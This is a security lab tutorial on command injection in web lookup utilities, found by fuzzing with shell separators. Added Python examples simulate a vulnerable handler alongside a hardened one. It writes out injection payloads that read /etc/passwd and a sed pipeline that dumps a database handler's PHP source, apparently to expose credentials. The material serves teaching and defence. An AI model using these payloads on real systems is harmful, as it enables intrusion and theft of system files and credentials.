Command injection occurs when an attacker is able to run operating
system commands or server-side scripts through the web application. The
vulnerability is common in web pages that offer utilities such as nslookup,
whois, ping or traceroute, because the application builds a shell command
from the user's input to run those tools. You can test for it with a technique
called fuzzing: a shell separator (";", "|", "||", "&" or "&&") is appended
to the end of the expected input (e.g., www.cnn.com), followed by a command
(e.g., cat /etc/passwd), and the response is checked for that command's output.
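The fuzzing technique above, as an added example that is not part of the original lab: a simulated lookup page that concatenates user input into a shell string, the payload list built from the separators the text names, and a hardened handler that rejects the same payloads. The lookup itself is replaced by `echo lookup` so the code runs offline; www.cnn.com is the page's own sample input, and the marker string and regex are this example's assumptions.

```python
"""Added example (not from the original lab): fuzzing a shell-backed lookup
page with the separators listed in the text, next to a hardened handler that
rejects the same payloads. 'echo lookup' stands in for nslookup so that it
runs offline; www.cnn.com is the page's sample input."""
import re
import subprocess

# The separators the page lists for fuzzing a shell-backed input field.
SEPARATORS = [";", "|", "||", "&", "&&"]


def fuzz_payloads(expected: str, command: str) -> list[str]:
    """One payload per separator: expected input, separator, attacker's command."""
    return [f"{expected} {sep} {command}" for sep in SEPARATORS]


def lookup_vulnerable(host: str) -> str:
    """Vulnerable pattern: user input concatenated into a single shell string."""
    return subprocess.run("echo lookup " + host, shell=True,
                          capture_output=True, text=True).stdout


# Hostname allow-list: dot-separated labels of letters, digits and hyphens.
HOSTNAME_RE = re.compile(
    r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$")


def lookup_hardened(host: str) -> str:
    """Allow-list the input, then pass it as its own argv element. No shell is
    involved, so separators carry no meaning even if the regex were relaxed."""
    if not HOSTNAME_RE.fullmatch(host):
        raise ValueError(f"rejected lookup target: {host!r}")
    return subprocess.run(["echo", "lookup", host],
                          capture_output=True, text=True).stdout


def probe(expected: str = "www.cnn.com", marker: str = "INJECTED") -> dict[str, bool]:
    """Send 'expected <sep> echo MARKER' through the vulnerable handler and
    record which separators got the injected command to run."""
    return {sep: marker in lookup_vulnerable(f"{expected} {sep} echo {marker}")
            for sep in SEPARATORS}


def hardened_rejects_all(expected: str = "www.cnn.com",
                         command: str = "cat /etc/passwd") -> bool:
    """True when every fuzzing payload is refused by the hardened handler."""
    for payload in fuzz_payloads(expected, command):
        try:
            lookup_hardened(payload)
            return False
        except ValueError:
            pass
    return True


if __name__ == "__main__":
    for sep, hit in probe().items():
        print(f"{sep:>2} -> {'command ran' if hit else 'no effect'}")
    print("hardened handler rejects all payloads:", hardened_rejects_all())
    print(lookup_hardened("www.cnn.com"), end="")
```

Running the probe shows why the text lists several separators: ";", "|", "&" and "&&" all get the second command executed, but "||" only runs it when the first command fails, so fuzz that one with a host that makes the legitimate lookup fail as well. When the payload travels in a URL query string, "&" must be sent as %26 (and "|" is safest as %7C), otherwise the web server splits the parameter before the shell ever sees it.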

What is Fuzzing?

Fuzz testing, or fuzzing, is a software testing technique that involves
providing invalid, unexpected or random data to the inputs of a computer
program. The program is then monitored for exceptions such as crashes,
failing built-in code assertions or potential memory leaks. Fuzzing is
commonly used to test for security problems in software or computer
systems.

Note:
This is not absolutely necessary, but if you are a computer security
student or professional, you should have a BackTrack VM.

Lab Notes

In this lab we will do the following:

Find a command injection/execution vulnerability by fuzzing and exploit it.

Operating System Reconnaissance

Application Home Directory Reconnaissance

Database Reconnaissance

Encoding PHP Script to View Contents

Remotely Connecting to Database

Legal Disclaimer

As a condition of your use of this Web
site, you warrant to computersecuritystudent.com that you will not use
this Web site for any purpose that is unlawful or
that is prohibited by these terms, conditions, and notices.

In accordance with UCC § 2-316, this
product is provided with "no warranties, either express or implied." The
information contained is provided "as-is", with "no guarantee of
merchantability."

In addition, this is a teaching website
that does not condone malicious behavior of
any kind.

You are on notice, that continuing
and/or using this lab outside your "own" test environment
is considered
malicious and is against the law.

I guess I could have shown you this first,
but good things come to those who wait.

It is possible to display the contents of the MySQLHandler.php program by
encoding the "<?php" and "?>" tags. These tags mark the code that the
server's PHP interpreter executes when the file is served. When the file is
instead read out through the injection and echoed into the HTML response,
the browser treats everything between "<" and ">" as markup rather than
text, so the PHP code is parsed away and never appears on screen. To get
around this problem and just display the text of the program, we change
"<" to "&#60;" and ">" to "&#62;", which the browser renders as the literal
characters.
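The encoding trick above, as an added example that is not part of the original lab: a constructed stand-in for MySQLHandler.php is fed to Python's HTML parser once raw and once with "<" and ">" replaced by "&#60;" and "&#62;", and the parser's text output shows what a browser would display in each case. The sed pipeline is the shell form of the same substitution; the file name and its location are assumptions, and the PHP source below is made up for the demonstration.

```python
"""Added example (not from the original lab): why PHP source echoed into an
HTML page is invisible, and how replacing < and > with &#60; and &#62;
makes it readable. PHP_SOURCE is a constructed stand-in for MySQLHandler.php,
not the real file."""
import subprocess
from html.parser import HTMLParser

# Constructed sample; the real file's contents are not shown on this page.
PHP_SOURCE = (
    "<?php\n"
    "// constructed sample, not the real MySQLHandler.php\n"
    "$dbhost = \"localhost\";\n"
    "$dbuser = \"root\";\n"
    "$dbpass = \"secret\";\n"
    "?>\n"
)

# Shell form of the trick as it would be appended to the lookup input.
# The relative path is an assumption about where the script lives.
SED_PAYLOAD = "; cat MySQLHandler.php | sed 's/</\\&#60;/g' | sed 's/>/\\&#62;/g'"


def encode_angle_brackets(text: str) -> str:
    """The substitution the sed pipeline performs, done in Python."""
    return text.replace("<", "&#60;").replace(">", "&#62;")


def encode_with_sed(text: str) -> str:
    """Run the same substitution through the real sed pipeline (needs sh and
    sed on PATH). In a sed replacement '&' means the match, hence the '\\&'."""
    return subprocess.run(
        ["sh", "-c", "sed 's/</\\&#60;/g' | sed 's/>/\\&#62;/g'"],
        input=text, capture_output=True, text=True, check=True).stdout


class VisibleText(HTMLParser):
    """Keeps only what a browser renders as text. Tags, comments and
    processing instructions (anything from '<' to the next '>') are dropped,
    and character references are decoded (convert_charrefs defaults to True)."""

    def __init__(self) -> None:
        super().__init__()
        self.parts: list[str] = []

    def handle_data(self, data: str) -> None:
        self.parts.append(data)


def rendered_text(html: str) -> str:
    """Approximation of the text a browser would show for this HTML."""
    parser = VisibleText()
    parser.feed(html)
    parser.close()
    return "".join(parser.parts)


if __name__ == "__main__":
    print("raw source as the browser shows it:", repr(rendered_text(PHP_SOURCE)))
    print("encoded source as the browser shows it:")
    print(rendered_text(encode_angle_brackets(PHP_SOURCE)), end="")
    print("sed pipeline matches Python:",
          encode_with_sed(PHP_SOURCE) == encode_angle_brackets(PHP_SOURCE))
```

The raw version renders as a single newline: the parser swallows "<?php" through "?>" as one processing instruction, exactly as the browser does. The encoded version renders as the full source, because "&#60;" and "&#62;" are decoded to the characters after tag parsing is finished. Note that the same trick would also work with "&lt;" and "&gt;"; the numeric references are just what the lab uses.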